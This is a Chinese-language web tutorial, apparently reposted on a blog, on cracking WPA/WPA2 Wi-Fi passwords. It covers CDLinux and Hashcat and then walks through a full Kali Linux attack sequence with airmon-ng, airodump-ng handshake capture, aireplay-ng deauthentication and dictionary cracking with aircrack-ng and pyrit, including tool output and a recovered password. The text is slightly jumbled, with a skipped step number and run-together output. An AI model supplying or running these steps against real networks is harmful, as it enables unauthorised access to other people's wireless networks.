cdlinux破解无线网络提示没有找到密码

cdlinux破解无线网络提示没有找到密码,第1张

cdlinux破解无线网络提示没有找到密码解决办法:

1、扫描无线网络获取握手包(,破解握手包,获取密码。其中抢包和跑包是最关键的两个步骤,要花很多时间。

2、CDLinux:一个小的Linux系统,用来抓包。它有中文界面,可以放入u盘。

3、Hashcat:一个极其强大的密码破解工具,支持GPU加速。除了WPA,还能破解md5、zip等密码。

5、运行CDLinux,保存抓包文件,容量512M以上,带无线网卡的PC:带外接无线网卡的笔记本或台式机都可以。最好有独立的显卡,可以提高包运行的效率。辅助工具:UltraISO、BOOTICE、grldr和menu.lst,用于从u盘启动CDLinux。

6、格式化u盘,文件系统为FAT32,卷标设置为CDLINUX,运行UltraISO,点击文件-打开-选择下载的CDLinux打开,点击左上方窗口的CDLinux,将右边窗口的CDLINUX目录文件复制到u盘根目录。

7、:拿包。需要一个安装了CDLinux的u盘。

8、跑包。需要Hashcat。跑包是整个过程中最重要的,核心思想是穷尽密码,这个环节比较耗时。穷尽所有密码当然是不现实的。想想常用的密码,基本都是8位纯数字,那就从8位纯数字密码开始。Hashcat正好符合要求。在GPU加速的情况下,运行一个8位纯数字密码大概需要15分钟。

首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡

root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lono wireless extensions.

查看无线网卡设备名

root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772dhclient4415wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187Lrtl8187 - [phy0](monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络

从中找到你要测试破解的,copy下来BSSID

root@kali:~/test# airodump-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSIDE4:D3:32:41:56:12 -44 53 17170 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATIONPWR RateLostFrames Probe E4:D3:32:41:56:12 00:00:00:00:00:0000 - 1 018135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -211e- 6e 07

当看到WPA handshake:说明抓到了握手包,就可以来破解了

如果一直抓不到,可以用如下命令来攻击,强迫重新握手

aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one

抓到握手包后,就可以用字典来跑密码了。

root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...

跑的速度如何取决于你机器的性能,更取决于你的字典

如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多

kali linux下装显卡驱动,sdk等,参考如下链接

http://xiao106347.blog.163.com/blog/static/2159920782013113013549364

http://vistb.net/2011/08/how-to-crack-wifi-part-four/

http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡,很快就跑出了密码

root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far86496 PMKs per second.The password is 'qq123789'.


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/yw/7086106.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-04-01
下一篇2023-04-01

发表评论

登录后才能评论

评论列表(0条)

    保存